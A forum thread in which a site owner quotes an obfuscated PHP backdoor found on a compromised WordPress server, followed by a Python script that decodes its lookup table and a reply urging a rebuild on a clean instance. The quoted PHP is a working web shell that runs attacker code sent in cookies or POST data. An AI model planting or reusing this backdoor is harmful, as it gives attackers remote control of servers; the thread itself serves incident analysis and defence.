
We have some malware on our aws (hosting Wordpress and own application) instance which is doing strange things:

  • chmod 755 /var/www/html independently of what it was before

  • copies index.html to index.html.bak.bak and deletes index.html. When I run ausearch on index.html, I get directed to a folder managed by our application that contains an object with a random name like mqnwtxzg.php. Contents of such a php file:

    $wezhgja = 'incsr_f8y-g6a9kl3ubx\'5vp14d7mt*#oHe';$lcxtas = Array();$lcxtas[] = $wezhgja[2].$wezhgja[6].$wezhgja[2].$wezhgja[21].$wezhgja[27].$wezhgja[18].$wezhgja[11].$wezhgja[27].$wezhgja[9].$wezhgja[27].$wezhgja[24].$wezhgja[25].$wezhgja[2].$wezhgja[9].$wezhgja[25].$wezhgja[21].$wezhgja[13].$wezhgja[11].$wezhgja[9].$wezhgja[13].$wezhgja[7].$wezhgja[27].$wezhgja[12].$wezhgja[9].$wezhgja[24].$wezhgja[16].$wezhgja[18].$wezhgja[21].$wezhgja[24].$wezhgja[18].$wezhgja[18].$wezhgja[2].$wezhgja[25].$wezhgja[18].$wezhgja[24].$wezhgja[2];$lcxtas[] = $wezhgja[2].$wezhgja[4].$wezhgja[34].$wezhgja[12].$wezhgja[29].$wezhgja[34].$wezhgja[5].$wezhgja[6].$wezhgja[17].$wezhgja[1].$wezhgja[2].$wezhgja[29].$wezhgja[0].$wezhgja[32].$wezhgja[1];$lcxtas[] = $wezhgja[33].$wezhgja[30];$lcxtas[] = $wezhgja[31];$lcxtas[] = $wezhgja[2].$wezhgja[32].$wezhgja[17].$wezhgja[1].$wezhgja[29];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[5].$wezhgja[4].$wezhgja[34].$wezhgja[23].$wezhgja[34].$wezhgja[12].$wezhgja[29];$lcxtas[] = $wezhgja[34].$wezhgja[19].$wezhgja[23].$wezhgja[15].$wezhgja[32].$wezhgja[26].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[17].$wezhgja[18].$wezhgja[3].$wezhgja[29].$wezhgja[4];$lcxtas[] = $wezhgja[12].$wezhgja[4].$wezhgja[4].$wezhgja[12].$wezhgja[8].$wezhgja[5].$wezhgja[28].$wezhgja[34].$wezhgja[4].$wezhgja[10].$wezhgja[34];$lcxtas[] = $wezhgja[3].$wezhgja[29].$wezhgja[4].$wezhgja[15].$wezhgja[34].$wezhgja[1];$lcxtas[] = $wezhgja[23].$wezhgja[12].$wezhgja[2].$wezhgja[14];foreach ($lcxtas[8]($_COOKIE, $_POST) as $tlfwyg => $bdxjqs){function irgndu($lcxtas, $tlfwyg, $zskgpvt){return $lcxtas[7]($lcxtas[5]($tlfwyg . 
$lcxtas[0], ($zskgpvt / $lcxtas[9]($tlfwyg)) + 1), 0, $zskgpvt);}function fpdyn($lcxtas, $eklrh){return @$lcxtas[10]($lcxtas[2], $eklrh);}function zmychft($lcxtas, $eklrh){$rugfslb = $lcxtas[4]($eklrh) % 3;if (!$rugfslb) {$zttttc = $lcxtas[1]; $tdber = $zttttc("", $eklrh[1]($eklrh[2]));$tdber();exit();}}$bdxjqs = fpdyn($lcxtas, $bdxjqs);zmychft($lcxtas, $lcxtas[6]($lcxtas[3], $bdxjqs ^ irgndu($lcxtas, $tlfwyg, $lcxtas[9]($bdxjqs))));}  
    
  • In another random folder I find objects like these: /somefolder/.5d45a5b3.ico

We regularly check for this stuff and delete all these strange objects, but a day or so later they are back again. The only thing that has changed is that the strange objects now have different names and are placed in different folders.

We are running malware scans on our system and they detect these objects, but nothing so far prevents them from coming back.

Did anyone experience similar problems and can anyone recommend anything to get rid of this stuff?

Can anyone guide us to someone who can help, even if that service would be payable?

michaelsmith
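A resolver for the string-index obfuscation used in the quoted mqnwtxzg.php, added here as an example (it is not code from the question or the answer): it rebuilds the `$lcxtas[]` lookup table from the `$wezhgja[n]` indices so the dropper can be read without executing it. The embedded excerpt is constructed from the sample on the page (the alphabet string, four of the eleven table entries and the loop header); the SUSPICIOUS function list is my own.

```python
import re

# Constructed excerpt of the mqnwtxzg.php sample quoted above: its alphabet
# string, four of the eleven $lcxtas[] entries and the dispatch loop header.
SAMPLE = (
    r"$wezhgja = 'incsr_f8y-g6a9kl3ubx\'5vp14d7mt*#oHe';$lcxtas = Array();"
    r"$lcxtas[] = $wezhgja[2].$wezhgja[4].$wezhgja[34].$wezhgja[12].$wezhgja[29]."
    r"$wezhgja[34].$wezhgja[5].$wezhgja[6].$wezhgja[17].$wezhgja[1].$wezhgja[2]."
    r"$wezhgja[29].$wezhgja[0].$wezhgja[32].$wezhgja[1];"
    r"$lcxtas[] = $wezhgja[33].$wezhgja[30];"
    r"$lcxtas[] = $wezhgja[12].$wezhgja[4].$wezhgja[4].$wezhgja[12].$wezhgja[8]."
    r"$wezhgja[5].$wezhgja[28].$wezhgja[34].$wezhgja[4].$wezhgja[10].$wezhgja[34];"
    r"$lcxtas[] = $wezhgja[23].$wezhgja[12].$wezhgja[2].$wezhgja[14];"
    r"foreach ($lcxtas[8]($_COOKIE, $_POST) as $tlfwyg => $bdxjqs){"
)

# $name = '...';   the alphabet that every index points into
ALPHABET_RE = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")
# $arr[] = $name[i].$name[j]...;   one rebuilt string per table entry
ENTRY_RE = re.compile(r"\$(\w+)\[\]\s*=\s*((?:\$\w+\[\d+\]\s*\.?\s*)+);")
INDEX_RE = re.compile(r"\[(\d+)\]")

# Functions whose presence in a lookup table marks a dynamic-eval style shell
# (my own list; extend it for your environment).
SUSPICIOUS = {"create_function", "eval", "assert", "pack", "array_merge",
              "base64_decode", "gzinflate", "str_rot13", "preg_replace"}

def php_unescape_single(s):
    # Inside PHP single quotes only \' and \\ are escape sequences.
    return s.replace("\\'", "'").replace("\\\\", "\\")

def resolve_tables(php_src):
    """Rebuild every $arr[] lookup table by resolving its $alphabet[n] indices."""
    alphabets = {n: php_unescape_single(b) for n, b in ALPHABET_RE.findall(php_src)}
    tables = {}
    for arr, expr in ENTRY_RE.findall(php_src):
        alpha = alphabets[re.search(r"\$(\w+)\[", expr).group(1)]
        tables.setdefault(arr, []).append(
            "".join(alpha[int(i)] for i in INDEX_RE.findall(expr)))
    return tables

def request_sources(php_src):
    """Superglobals the sample reads, i.e. where its input arrives from."""
    return sorted(set(re.findall(r"\$_(COOKIE|POST|GET|REQUEST)\b", php_src)))

def triage(php_src):
    """Decoded tables, the suspicious names among them, and the input channels."""
    tables = resolve_tables(php_src)
    hits = sorted({w for words in tables.values() for w in words if w in SUSPICIOUS})
    return tables, hits, request_sources(php_src)
```

Run over the full sample from the question, the table also resolves to str_repeat, explode, substr and strlen, and the loop header reads array_merge($_COOKIE, $_POST), so requests to the randomly named .php files that carry unusual cookies are what to search for in the web server access log.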

1 Answer


Instead of fixing the symptoms you should direct your focus on making sure that your Wordpress installation is the latest version and update any plugins to the latest version. Considering the current system is compromised, do not try to "patch it". It is likely backdoored. Do not trust it. Make a backup of the data instead (e.g. the database) and rebuild the Wordpress site on a new instance using the latest versions.

Have a look at https://wordpress.org/support/article/faq-my-site-was-hacked/ and https://wordpress.org/support/article/hardening-wordpress/

Dennis
  • It is the latest WP version... Do you have a better suggestion? – michaelsmith Oct 22 '19 at 18:13
  • Do you have any plugins installed that may be out of date? Have they been out of date previously? Has an old version of WP been running previously that might have installed a backdoor? The point still stands though: Start fresh with a new uncompromised instance. – Dennis Oct 22 '19 at 19:17
  • All plugins are up to date and have always been updated regularly in the past. The problems started in April this year. Reinstalling the instance is very difficult as we have 15 million database connections on that instance per month. Shutting it down & rebuilding would be a major disruption to our users. There should be a way to find out what is triggering this behaviour – michaelsmith Oct 24 '19 at 07:09
  • My two pence: You have a compromised production system with potentially sensitive data. Depending on where your business is situated you might be compelled by law to report the (potential) data leak. I think it is _the_ time to inconvenience your users and do a proper analysis. The system is likely backdoored. Yes, there are ways to do analysis on the live system. However, I strongly recommend that you migrate the data to a new instance, reinstall the front/backend software and switch to the new database endpoints. Make a snapshot of the old system and thoroughly analyse that. – Dennis Oct 24 '19 at 07:29
  • In addition, have a look at https://medium.com/@lakin.mohapatra/prevent-wordpress-malware-from-infecting-server-8d5715c663fe as it particularly mentions malicious .ico files on a malware infected Wordpress and how to proceed with finding the root cause. – Dennis Oct 24 '19 at 07:38